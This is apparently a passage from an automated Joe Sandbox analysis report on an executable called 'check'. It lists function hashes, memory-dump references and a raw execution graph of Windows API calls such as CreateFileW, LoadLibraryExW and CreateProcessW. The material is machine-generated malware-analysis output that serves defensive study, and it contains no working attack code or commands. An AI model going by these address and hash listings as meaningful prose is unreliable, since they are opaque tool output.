                                                                                                                                                                                                                                          • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                          • Instruction ID: 7060670d16fe25130a5e2a1a4a3e4501f15ac21f69330d5fc9e0fb424bb7b213
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74210662B08A8182EB20AF11D88427DB3A1FB84B94FD54175DA4D43284EFBCE949C764
                                                                                                                                                                                                                                          Function 00007FF7124FFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                          • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                          • Instruction ID: 186b8ff2501686ea82f3f289fc57e715a6d7b0ab567ceabfe49c2ef7f800a09b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3114C32618F8182EB619F15E440259B7E4FB88B94F994234DF8D07754EF7CC955C740
                                                                                                                                                                                                                                          Function 00007FF71251073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                          • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                          • Instruction ID: 1fe3430162a72b061d5afa78aaf49a291a536279d56122a68d2cf6ca6372b998
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001A721B1CA0385F720BF6094A527EA7A0EF48764FC00475D94D42681EFBCE50CCB28

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:5.9%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:604
                                                                                                                                                                                                                                          Total number of Limit Nodes:16
                                                                                                                                                                                                                                          execution_graph 11837 7ff89d9b2b00 11838 7ff89d9b2b57 11837->11838 11839 7ff89d9b2b5b 11838->11839 11840 7ff89d9b2b9d 11838->11840 11846 7ff89da59d18 11839->11846 11842 7ff89d9b2bc0 11840->11842 11844 7ff89d9b2bb5 _Py_Dealloc 11840->11844 11844->11842 11845 7ff89d9b2b92 11847 7ff89da59d32 malloc 11846->11847 11848 7ff89d9b2b65 ??GQPainterPath@@QEBA?AV0@AEBV0@ 11847->11848 11849 7ff89da59d23 11847->11849 11848->11845 11849->11847 11850 7ff89da59d42 11849->11850 11851 7ff89da59d48 Concurrency::cancel_current_task 11850->11851 11852 7ff89da59d4e 11850->11852 11851->11852 11853 7ff89d9bb4d0 11854 7ff89d9bb511 11853->11854 11855 7ff89d9bb538 11854->11855 11856 7ff89da59d18 2 API calls 11854->11856 11858 7ff89d9bb5a9 11855->11858 11859 7ff89da59d18 2 API calls 11855->11859 11857 7ff89d9bb51f ??0QPainter@@QEAA 11856->11857 11857->11855 11860 7ff89d9bb58b ??0QPainter@@QEAA@PEAVQPaintDevice@@ 11859->11860 11861 7ff7124fbae0 11862 7ff7124fbb0e 11861->11862 11863 7ff7124fbaf5 11861->11863 11863->11862 11866 7ff71250d5fc 11863->11866 11864 7ff7124fbb6e 11868 7ff71250d645 11866->11868 11869 7ff71250d60b 11866->11869 11867 7ff71250d62e HeapAlloc 11867->11868 11867->11869 11868->11864 11869->11867 11869->11868 11870 7ff7124f2fe0 11873 7ff7124f2ff0 11870->11873 11874 7ff7124f3207 11873->11874 11880 7ff7124f302b 11873->11880 11881 7ff7124f1470 11873->11881 11894 7ff7124f1c80 11873->11894 11875 7ff7124f3273 11874->11875 11898 7ff71250a404 11874->11898 11877 7ff71250a404 _invalid_parameter_noinfo 11875->11877 11878 7ff7124f329c 11875->11878 11877->11878 11902 7ff7124f2500 11878->11902 11912 7ff7124f45c0 11881->11912 11883 7ff7124f1493 11884 7ff7124f149b 11883->11884 11920 7ff7125006d4 11883->11920 11884->11873 11886 7ff7124f14d1 11887 7ff7124f1538 11886->11887 11892 7ff7124f154b 11886->11892 11893 7ff7124f14d5 11886->11893 11924 7ff7124f1210 11887->11924 11891 7ff7124f15c4 11891->11873 11892->11893 11932 7ff71250039c 11892->11932 11928 7ff71250004c 11893->11928 11895 7ff7124f1ca5 11894->11895 12106 7ff712504984 11895->12106 11897 7ff7124f1cc8 11897->11873 11899 7ff71250a41b 11898->11899 11901 7ff71250a448 11898->11901 11899->11901 12117 7ff71250a4a4 11899->12117 11901->11875 11903 7ff7124f252c 11902->11903 11904 7ff7124f2536 11902->11904 11906 7ff7124f9390 2 API calls 11903->11906 11905 7ff7124f254b 11904->11905 11907 7ff7124f9390 2 API calls 11904->11907 11908 7ff7124f9390 2 API calls 11905->11908 11910 7ff7124f2560 11905->11910 11906->11904 11907->11905 11908->11910 12121 7ff7124f2390 11910->12121 11911 7ff7124f257c 11911->11880 11913 7ff7124f45cc 11912->11913 11935 7ff7124f9390 11913->11935 11915 7ff7124f45f4 11916 7ff7124f9390 2 API calls 11915->11916 11917 7ff7124f4607 11916->11917 11940 7ff712505f94 11917->11940 11919 7ff7124f4616 11919->11883 11921 7ff712500704 11920->11921 12076 7ff712500464 11921->12076 11923 7ff71250071d 11923->11886 11927 7ff7124f1268 11924->11927 11925 7ff71250039c _fread_nolock 23 API calls 11925->11927 11926 7ff7124f126f 11926->11893 11927->11925 11927->11926 11929 7ff71250007c 11928->11929 12085 7ff7124ffe28 11929->12085 11931 7ff712500095 11931->11891 12094 7ff7125003bc 11932->12094 11936 7ff7124f93b2 MultiByteToWideChar 11935->11936 11937 7ff7124f93d6 11935->11937 11936->11937 11939 7ff7124f93ec 11936->11939 11938 7ff7124f93f3 MultiByteToWideChar 11937->11938 11937->11939 11938->11939 11939->11915 11941 7ff712505ec8 11940->11941 11942 7ff712505eee 11941->11942 11944 7ff712505f21 11941->11944 11943 7ff712505ef3 _invalid_parameter_noinfo 11942->11943 11945 7ff712505efe 11943->11945 11944->11945 11951 7ff71250ac28 11944->11951 11945->11919 11949 7ff712505f68 11962 7ff712505478 LeaveCriticalSection 11949->11962 11952 7ff71250ac3f 11951->11952 11963 7ff71250ac9c 11952->11963 11956 7ff712505f3e 11956->11945 11957 7ff71250fecc 11956->11957 11986 7ff71250fbc8 11957->11986 11960 7ff71250ff26 11960->11949 11966 7ff71250accd 11963->11966 11964 7ff71250ad1c 11977 7ff71250eb98 11964->11977 11966->11964 11971 7ff71250ac4a 11966->11971 11975 7ff71250546c EnterCriticalSection 11966->11975 11976 7ff712505478 LeaveCriticalSection 11966->11976 11967 7ff71250ad29 11981 7ff71250a948 11967->11981 11970 7ff71250ad33 11970->11971 11985 7ff71250546c EnterCriticalSection 11970->11985 11974 7ff712510338 LeaveCriticalSection 11971->11974 11980 7ff71250eba9 11977->11980 11978 7ff71250ebde HeapAlloc 11979 7ff71250ebf8 11978->11979 11978->11980 11979->11967 11980->11978 11980->11979 11982 7ff71250a94d HeapFree 11981->11982 11984 7ff71250a975 11981->11984 11983 7ff71250a968 GetLastError 11982->11983 11982->11984 11983->11984 11984->11970 11989 7ff71250fc03 11986->11989 11987 7ff71250fea1 _invalid_parameter_noinfo 11988 7ff71250fdd3 11987->11988 11988->11960 11990 7ff712516d54 11988->11990 11989->11987 11989->11988 11993 7ff712516354 11990->11993 11994 7ff712516389 11993->11994 11995 7ff71251636b 11993->11995 11994->11995 11997 7ff7125163a5 11994->11997 11996 7ff712516370 _invalid_parameter_noinfo 11995->11996 12000 7ff71251637e 11996->12000 12002 7ff712516964 11997->12002 11999 7ff7125163d0 11999->12000 12021 7ff7125084f8 LeaveCriticalSection 11999->12021 12000->11960 12003 7ff7125169ab 12002->12003 12004 7ff712516a16 CreateFileW 12003->12004 12016 7ff7125169d9 12003->12016 12005 7ff712516afc GetFileType 12004->12005 12006 7ff712516a81 12004->12006 12007 7ff712516b09 GetLastError 12005->12007 12008 7ff712516b5a 12005->12008 12009 7ff712516ac9 GetLastError 12006->12009 12011 7ff712516a8f CreateFileW 12006->12011 12010 7ff712504e7c 12007->12010 12022 7ff712508438 12008->12022 12009->12016 12012 7ff712516b18 CloseHandle 12010->12012 12011->12005 12011->12009 12012->12016 12020 7ff712516b4a 12012->12020 12014 7ff712516b7c 12014->12016 12026 7ff712516418 12014->12026 12016->11999 12017 7ff712516c0e 12017->12016 12018 7ff712516c9c CloseHandle CreateFileW 12017->12018 12019 7ff712516ce3 GetLastError 12018->12019 12018->12020 12019->12020 12020->12016 12023 7ff71250845b 12022->12023 12024 7ff7125084b9 12022->12024 12023->12024 12025 7ff7125084b0 SetStdHandle 12023->12025 12024->12014 12025->12024 12027 7ff712516469 12026->12027 12031 7ff71251653a 12026->12031 12030 7ff712516480 12027->12030 12032 7ff712509b78 12027->12032 12030->12031 12036 7ff71250ba5c 12030->12036 12031->12017 12033 7ff712509b98 12032->12033 12034 7ff712509b81 12032->12034 12033->12030 12035 7ff712509b86 _invalid_parameter_noinfo 12034->12035 12035->12033 12037 7ff71250ba84 12036->12037 12038 7ff71250ba9d 12036->12038 12037->12031 12038->12037 12040 7ff71250baf1 12038->12040 12041 7ff71250bb22 12038->12041 12039 7ff71250be89 _invalid_parameter_noinfo 12039->12037 12040->12039 12042 7ff71250bb49 12041->12042 12043 7ff71250bb83 12041->12043 12047 7ff71250bb56 12041->12047 12042->12047 12061 7ff71250bb72 12042->12061 12044 7ff71250d5fc _fread_nolock HeapAlloc 12043->12044 12045 7ff71250bb94 12044->12045 12048 7ff71250a948 __free_lconv_mon 2 API calls 12045->12048 12050 7ff71250bb62 _invalid_parameter_noinfo 12047->12050 12051 7ff71250bb9e 12048->12051 12049 7ff71250bc92 12052 7ff71250bd1e 12049->12052 12055 7ff71250bcb1 GetConsoleMode 12049->12055 12067 7ff71250bbad 12050->12067 12053 7ff71250a948 __free_lconv_mon 2 API calls 12051->12053 12054 7ff71250bd23 ReadFile 12052->12054 12053->12061 12056 7ff71250bd49 12054->12056 12057 7ff71250be3d GetLastError 12054->12057 12055->12052 12058 7ff71250bcc5 12055->12058 12056->12057 12063 7ff71250bd12 12056->12063 12057->12067 12058->12054 12060 7ff71250bccf ReadConsoleW 12058->12060 12059 7ff71250a948 __free_lconv_mon 2 API calls 12059->12037 12062 7ff71250bcf3 GetLastError 12060->12062 12060->12063 12061->12067 12068 7ff71251391c 12061->12068 12062->12067 12064 7ff71250be2b 12063->12064 12063->12067 12072 7ff71250b4b4 12064->12072 12066 7ff71250be38 12066->12067 12067->12059 12069 7ff712513932 12068->12069 12070 7ff712513925 12068->12070 12069->12070 12071 7ff712513969 _invalid_parameter_noinfo 12069->12071 12070->12049 12071->12070 12073 7ff71250b4ff 12072->12073 12074 7ff71250b580 ReadFile 12073->12074 12075 7ff71250b57b 12073->12075 12074->12075 12075->12066 12077 7ff7125004ce 12076->12077 12078 7ff71250048e 12076->12078 12077->12078 12084 7ff71250546c EnterCriticalSection 12077->12084 12078->11923 12080 7ff7125004df 12081 7ff7125005e8 _invalid_parameter_noinfo 12080->12081 12082 7ff7125004f1 12081->12082 12083 7ff712505478 _fread_nolock LeaveCriticalSection 12082->12083 12083->12078 12086 7ff7124ffe71 12085->12086 12088 7ff7124ffe43 12085->12088 12086->12088 12093 7ff71250546c EnterCriticalSection 12086->12093 12088->11931 12089 7ff7124ffe88 12090 7ff7124ffea4 7 API calls 12089->12090 12091 7ff7124ffe94 12090->12091 12092 7ff712505478 _fread_nolock LeaveCriticalSection 12091->12092 12092->12088 12095 7ff7125003e6 12094->12095 12096 7ff7125003b4 12094->12096 12095->12096 12097 7ff7125003f5 memcpy_s 12095->12097 12098 7ff712500432 12095->12098 12096->11892 12102 7ff71250040a _invalid_parameter_noinfo 12097->12102 12105 7ff71250546c EnterCriticalSection 12098->12105 12100 7ff71250043a 12101 7ff71250013c _fread_nolock 20 API calls 12100->12101 12103 7ff712500451 12101->12103 12102->12096 12104 7ff712505478 _fread_nolock LeaveCriticalSection 12103->12104 12104->12096 12108 7ff7125049de 12106->12108 12107 7ff712504b1c 12110 7ff71250a948 __free_lconv_mon 2 API calls 12107->12110 12108->12107 12109 7ff712504a03 12108->12109 12111 7ff712504af1 12108->12111 12112 7ff712504b40 12108->12112 12115 7ff712504ae8 12108->12115 12109->11897 12110->12109 12114 7ff71250a948 __free_lconv_mon 2 API calls 12111->12114 12112->12107 12113 7ff712504b4a 12112->12113 12116 7ff71250a948 __free_lconv_mon 2 API calls 12113->12116 12114->12109 12115->12107 12115->12111 12116->12109 12120 7ff71250a4b1 12117->12120 12118 7ff71250a4c7 _invalid_parameter_noinfo 12119 7ff71250a4ce 12118->12119 12119->11901 12120->12118 12120->12119 12122 7ff7124fc850 12121->12122 12123 7ff7124f23a9 GetModuleHandleW 12122->12123 12124 7ff7124f23e5 memcpy_s 12123->12124 12136 7ff71250796c 12124->12136 12126 7ff7124f2451 12127 7ff71250796c _invalid_parameter_noinfo 12126->12127 12128 7ff7124f245e 12127->12128 12129 7ff71250796c _invalid_parameter_noinfo 12128->12129 12130 7ff7124f246b DialogBoxIndirectParamW 12129->12130 12131 7ff7124f24a1 12130->12131 12132 7ff7124f24c1 DeleteObject 12131->12132 12133 7ff7124f24c7 12131->12133 12132->12133 12134 7ff7124f24d3 DestroyIcon 12133->12134 12135 7ff7124f24d9 12133->12135 12134->12135 12135->11911 12137 7ff71250798a 12136->12137 12139 7ff7125079b9 12136->12139 12137->12139 12140 7ff712510474 12137->12140 12139->12126 12143 7ff712510481 12140->12143 12141 7ff712510498 _invalid_parameter_noinfo 12142 7ff71251049f 12141->12142 12142->12139 12143->12141 12143->12142 12144 7ff71250c1e0 12145 7ff71250c210 12144->12145 12148 7ff71250c014 12145->12148 12147 7ff71250c229 12149 7ff71250c06b 12148->12149 12155 7ff71250c03d 12148->12155 12149->12155 12156 7ff712508410 EnterCriticalSection 12149->12156 12151 7ff71250c0e2 12152 7ff71250c0f9 12151->12152 12153 7ff71250c134 SetFilePointerEx GetLastError 12151->12153 12154 7ff7125084f8 _fread_nolock LeaveCriticalSection 12152->12154 12153->12152 12154->12155 12155->12147 12157 7ff7124facad 12160 7ff7124fa983 12157->12160 12159 7ff7124fab96 12160->12159 12161 7ff7124fbd90 12160->12161 12162 7ff7124fbdb3 12161->12162 12163 7ff7124fbdd1 12161->12163 12164 7ff71250d5fc HeapAlloc 12162->12164 12163->12159 12164->12163 12165 7ff7124fcc3c 12166 7ff7124fcc50 12165->12166 12167 7ff7124fcd88 12166->12167 12168 7ff7124fcc58 __scrt_acquire_startup_lock 12166->12168 12255 7ff7124fd12c IsProcessorFeaturePresent 12167->12255 12170 7ff7124fcd92 12168->12170 12174 7ff7124fcc76 12168->12174 12171 7ff7124fd12c 7 API calls 12170->12171 12175 7ff7124fcc9b 12171->12175 12172 7ff7124fcccc __scrt_release_startup_lock 12173 7ff7124fccd8 12172->12173 12176 7ff7124fcd21 __scrt_get_show_window_mode 12173->12176 12250 7ff712509b2c 12173->12250 12174->12172 12174->12175 12177 7ff7124fcd2e 12176->12177 12180 7ff7124f1000 12177->12180 12181 7ff7124f1009 12180->12181 12262 7ff712505484 12181->12262 12183 7ff7124f37fb 12266 7ff7124f36b0 12183->12266 12185 7ff7124f3804 12211 7ff7124f3808 12185->12211 12276 7ff7124f1950 12185->12276 12187 7ff7124f3825 12188 7ff7124f391b 12187->12188 12189 7ff7124f383c 12187->12189 12191 7ff7124f45c0 33 API calls 12188->12191 12190 7ff7124f1c80 2 API calls 12189->12190 12194 7ff7124f385b 12190->12194 12192 7ff7124f392b 12191->12192 12192->12211 12303 7ff7124f7f90 12192->12303 12204 7ff7124f38bb 12194->12204 12194->12211 12300 7ff7124f89a0 12194->12300 12195 7ff7124f395d 12196 7ff7124f3984 12195->12196 12197 7ff7124f3962 12195->12197 12199 7ff7124f1c80 2 API calls 12196->12199 12198 7ff71250004c 9 API calls 12197->12198 12198->12211 12201 7ff7124f39a3 12199->12201 12206 7ff7124f1950 42 API calls 12201->12206 12203 7ff7124f3a0b 12205 7ff7124f89a0 2 API calls 12203->12205 12212 7ff7124f390e 12204->12212 12312 7ff7124f8940 12204->12312 12207 7ff7124f3a17 12205->12207 12206->12194 12208 7ff7124f89a0 2 API calls 12207->12208 12209 7ff7124f3a23 12208->12209 12210 7ff7124f89a0 2 API calls 12209->12210 12210->12212 12211->12175 12212->12211 12213 7ff7124f8940 2 API calls 12212->12213 12214 7ff7124f3aab 12212->12214 12213->12214 12215 7ff7124f3c46 12214->12215 12216 7ff7124f3d41 12214->12216 12215->12211 12218 7ff7124f3c50 12215->12218 12221 7ff7124f1c80 2 API calls 12215->12221 12317 7ff7124f44e0 12216->12317 12218->12211 12222 7ff7124f3dc4 12218->12222 12224 7ff7124f3da7 SetDllDirectoryW LoadLibraryExW 12218->12224 12219 7ff7124f3d4f 12219->12218 12220 7ff7124f1c80 2 API calls 12219->12220 12220->12218 12221->12218 12223 7ff7124f9390 2 API calls 12222->12223 12225 7ff7124f3dd7 SetDllDirectoryW 12223->12225 12224->12222 12236 7ff7124f3e0a 12225->12236 12248 7ff7124f3e5a 12225->12248 12227 7ff7124f4008 12228 7ff7124f4035 12227->12228 12229 7ff7124f4012 PostMessageW GetMessageW 12227->12229 12295 7ff7124f3360 12228->12295 12229->12228 12230 7ff7124f3f1b 12328 7ff7124f33c0 12230->12328 12232 7ff7124f3f23 12232->12211 12233 7ff7124f3f2b 12232->12233 12238 7ff7124f3f64 12233->12238 12239 7ff7124f3f41 PostMessageW GetMessageW 12233->12239 12235 7ff7124f3ef2 12237 7ff7124f8940 2 API calls 12235->12237 12236->12235 12241 7ff7124f3e4e 12236->12241 12237->12248 12240 7ff7124f8940 2 API calls 12238->12240 12239->12238 12242 7ff7124f3f77 12240->12242 12241->12248 12320 7ff7124f7340 12241->12320 12335 7ff7124f89e0 12242->12335 12245 7ff7124f4045 12246 7ff7124f3e81 12246->12248 12323 7ff7124f71b0 12246->12323 12248->12227 12248->12230 12249 7ff7124f3f7f 12249->12211 12251 7ff712509b43 12250->12251 12252 7ff712509b64 12250->12252 12251->12176 12507 7ff71250a3d8 12252->12507 12256 7ff7124fd152 memcpy_s 12255->12256 12257 7ff7124fd171 RtlCaptureContext RtlLookupFunctionEntry 12256->12257 12258 7ff7124fd1d6 memcpy_s 12257->12258 12259 7ff7124fd19a RtlVirtualUnwind 12257->12259 12260 7ff7124fd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12258->12260 12259->12258 12261 7ff7124fd256 12260->12261 12261->12170 12263 7ff71250f480 12262->12263 12265 7ff71250f4d3 12263->12265 12378 7ff71250f358 12263->12378 12265->12183 12267 7ff7124fc850 12266->12267 12268 7ff7124f36bc GetModuleFileNameW 12267->12268 12269 7ff7124f3710 12268->12269 12270 7ff7124f36eb GetLastError 12268->12270 12386 7ff7124f9280 FindFirstFileExW 12269->12386 12389 7ff7124f2c50 12270->12389 12273 7ff7124f371a 12275 7ff7124f3706 12273->12275 12399 7ff7124f9440 12273->12399 12275->12185 12277 7ff7124f45c0 33 API calls 12276->12277 12278 7ff7124f1985 12277->12278 12279 7ff7124f1c43 12278->12279 12280 7ff7124f7f90 23 API calls 12278->12280 12279->12187 12281 7ff7124f19cb 12280->12281 12282 7ff7125006d4 3 API calls 12281->12282 12294 7ff7124f19e9 12281->12294 12284 7ff7124f19e5 12282->12284 12283 7ff71250004c 9 API calls 12283->12279 12285 7ff71250039c _fread_nolock 23 API calls 12284->12285 12284->12294 12286 7ff7124f1a20 12285->12286 12287 7ff7124f1c80 2 API calls 12286->12287 12286->12294 12288 7ff7124f1a92 12287->12288 12289 7ff7124f1c80 2 API calls 12288->12289 12290 7ff7124f1add 12289->12290 12291 7ff7125006d4 3 API calls 12290->12291 12292 7ff7124f1b01 12291->12292 12293 7ff71250039c _fread_nolock 23 API calls 12292->12293 12292->12294 12293->12294 12294->12283 12415 7ff7124f6360 12295->12415 12297 7ff7124f336e 12299 7ff7124f338d 12297->12299 12429 7ff7124f6050 12297->12429 12299->12245 12301 7ff7124f9390 2 API calls 12300->12301 12302 7ff7124f89b4 12301->12302 12302->12204 12304 7ff7124f7fb4 12303->12304 12305 7ff7124f808b 12304->12305 12306 7ff7125006d4 3 API calls 12304->12306 12305->12195 12307 7ff7124f7fd0 12306->12307 12307->12305 12441 7ff7125078c8 12307->12441 12309 7ff7124f7fe5 12309->12305 12310 7ff7125006d4 3 API calls 12309->12310 12311 7ff71250039c _fread_nolock 23 API calls 12309->12311 12310->12309 12311->12309 12313 7ff7124f9390 2 API calls 12312->12313 12314 7ff7124f895c 12313->12314 12315 7ff7124f9390 2 API calls 12314->12315 12316 7ff7124f896c 12315->12316 12316->12203 12318 7ff7124f1c80 2 API calls 12317->12318 12319 7ff7124f44fd 12318->12319 12319->12219 12321 7ff7124f1470 42 API calls 12320->12321 12322 7ff7124f7368 12321->12322 12322->12246 12324 7ff7124f8e80 3 API calls 12323->12324 12325 7ff7124f71c9 12324->12325 12326 7ff7124f8e80 3 API calls 12325->12326 12327 7ff7124f71dc 12326->12327 12327->12248 12332 7ff7124f33ce memcpy_s 12328->12332 12330 7ff7124f1c80 2 API calls 12330->12332 12331 7ff7124f4560 2 API calls 12331->12332 12332->12330 12332->12331 12333 7ff7124f35c7 12332->12333 12454 7ff7124f4190 12332->12454 12465 7ff7124f4450 12332->12465 12333->12232 12336 7ff7124f8a00 12335->12336 12337 7ff7124f9390 2 API calls 12336->12337 12338 7ff7124f8a2d SetConsoleCtrlHandler GetStartupInfoW 12337->12338 12339 7ff7124f8a7a 12338->12339 12503 7ff71250a47c 12339->12503 12341 7ff7124f8a82 12342 7ff71250a47c _fread_nolock _invalid_parameter_noinfo 12341->12342 12343 7ff7124f8aa4 12342->12343 12344 7ff71250a47c _fread_nolock _invalid_parameter_noinfo 12343->12344 12345 7ff7124f8ac9 12344->12345 12346 7ff7124f8ad0 GetCommandLineW CreateProcessW 12345->12346 12347 7ff7124f8b4d RegisterClassW 12346->12347 12348 7ff7124f8b28 GetLastError 12346->12348 12350 7ff7124f8b91 CreateWindowExW 12347->12350 12351 7ff7124f8b8b GetLastError 12347->12351 12349 7ff7124f2c50 5 API calls 12348->12349 12359 7ff7124f8b43 12349->12359 12352 7ff7124f8bef ShowWindow 12350->12352 12353 7ff7124f8be7 GetLastError 12350->12353 12351->12350 12354 7ff7124f8bfa WaitForSingleObject 12352->12354 12353->12354 12355 7ff7124f8c0c 12354->12355 12356 7ff7124f8c88 12354->12356 12358 7ff7124f8c91 WaitForSingleObject 12355->12358 12360 7ff7124f8c15 GetLastError 12355->12360 12365 7ff7124f8c24 PeekMessageW 12355->12365 12357 7ff7124f8cd2 12356->12357 12356->12358 12363 7ff7124f8dc0 GetMessageW 12357->12363 12364 7ff7124f8cdf QueryPerformanceFrequency QueryPerformanceCounter 12357->12364 12361 7ff7124f8df8 12358->12361 12362 7ff7124f8ca7 TerminateProcess 12358->12362 12359->12249 12360->12355 12368 7ff7124f8e04 DestroyWindow 12361->12368 12369 7ff7124f8e11 GetExitCodeProcess CloseHandle CloseHandle 12361->12369 12370 7ff7124f8cbf WaitForSingleObject 12362->12370 12371 7ff7124f8cb9 GetLastError 12362->12371 12366 7ff7124f8dab 12363->12366 12367 7ff7124f8ddb TranslateMessage DispatchMessageW 12363->12367 12372 7ff7124f8d00 MsgWaitForMultipleObjects PeekMessageW 12364->12372 12374 7ff7124f8c76 WaitForSingleObject 12365->12374 12375 7ff7124f8c43 TranslateMessage DispatchMessageW PeekMessageW 12365->12375 12366->12361 12366->12363 12367->12366 12368->12369 12369->12359 12370->12361 12371->12370 12373 7ff7124f8d3a 12372->12373 12373->12363 12376 7ff7124f8d40 TranslateMessage DispatchMessageW PeekMessageW 12373->12376 12377 7ff7124f8d7c QueryPerformanceCounter 12373->12377 12374->12355 12374->12356 12375->12374 12375->12375 12376->12373 12376->12376 12377->12366 12377->12372 12385 7ff71250546c EnterCriticalSection 12378->12385 12387 7ff7124f92bf FindClose 12386->12387 12388 7ff7124f92d2 12386->12388 12387->12388 12388->12273 12390 7ff7124fc850 12389->12390 12391 7ff7124f2c70 GetCurrentProcessId 12390->12391 12392 7ff7124f2cb9 12391->12392 12404 7ff712504bd8 12392->12404 12394 7ff7124f2d04 12395 7ff7124f2d45 FormatMessageW 12394->12395 12396 7ff7124f2d7f MessageBoxW 12395->12396 12397 7ff7124f2d6d 12395->12397 12398 7ff7124f2daf 12396->12398 12397->12396 12398->12275 12400 7ff7124f946a WideCharToMultiByte 12399->12400 12402 7ff7124f9495 12399->12402 12400->12402 12403 7ff7124f94ab 12400->12403 12401 7ff7124f94b2 WideCharToMultiByte 12401->12403 12402->12401 12402->12403 12403->12275 12406 7ff712504c32 12404->12406 12405 7ff712504d74 12407 7ff71250a948 __free_lconv_mon 2 API calls 12405->12407 12406->12405 12408 7ff712504c57 12406->12408 12409 7ff712504d9a 12406->12409 12410 7ff712504d49 12406->12410 12411 7ff712504d40 12406->12411 12407->12408 12408->12394 12409->12405 12412 7ff712504da4 12409->12412 12413 7ff71250a948 __free_lconv_mon 2 API calls 12410->12413 12411->12405 12411->12410 12414 7ff71250a948 __free_lconv_mon 2 API calls 12412->12414 12413->12408 12414->12408 12416 7ff7124f6375 12415->12416 12417 7ff7124f1c80 2 API calls 12416->12417 12418 7ff7124f63b1 12417->12418 12423 7ff7124f63ba 12418->12423 12433 7ff7124f4560 12418->12433 12420 7ff7124f641d 12421 7ff7124f8e80 3 API calls 12420->12421 12422 7ff7124f642b 12420->12422 12421->12422 12422->12423 12437 7ff7124f8e80 12422->12437 12423->12297 12425 7ff7124f6476 12425->12423 12426 7ff7124f9390 2 API calls 12425->12426 12427 7ff7124f649a GetLastError 12426->12427 12428 7ff7124f2c50 5 API calls 12427->12428 12428->12423 12432 7ff7124f6070 12429->12432 12430 7ff7124f6099 12430->12299 12431 7ff7124f1470 42 API calls 12431->12432 12432->12430 12432->12431 12434 7ff7124f456a 12433->12434 12435 7ff7124f9390 2 API calls 12434->12435 12436 7ff7124f458f 12435->12436 12436->12420 12438 7ff7124f9390 2 API calls 12437->12438 12439 7ff7124f8e94 LoadLibraryExW 12438->12439 12440 7ff7124f8eb3 12439->12440 12440->12425 12442 7ff7125078f8 12441->12442 12445 7ff7125073d4 12442->12445 12444 7ff712507911 12444->12309 12446 7ff71250741e 12445->12446 12448 7ff7125073ef 12445->12448 12453 7ff71250546c EnterCriticalSection 12446->12453 12448->12444 12449 7ff712507423 12450 7ff712507440 _invalid_parameter_noinfo 12449->12450 12451 7ff71250742f 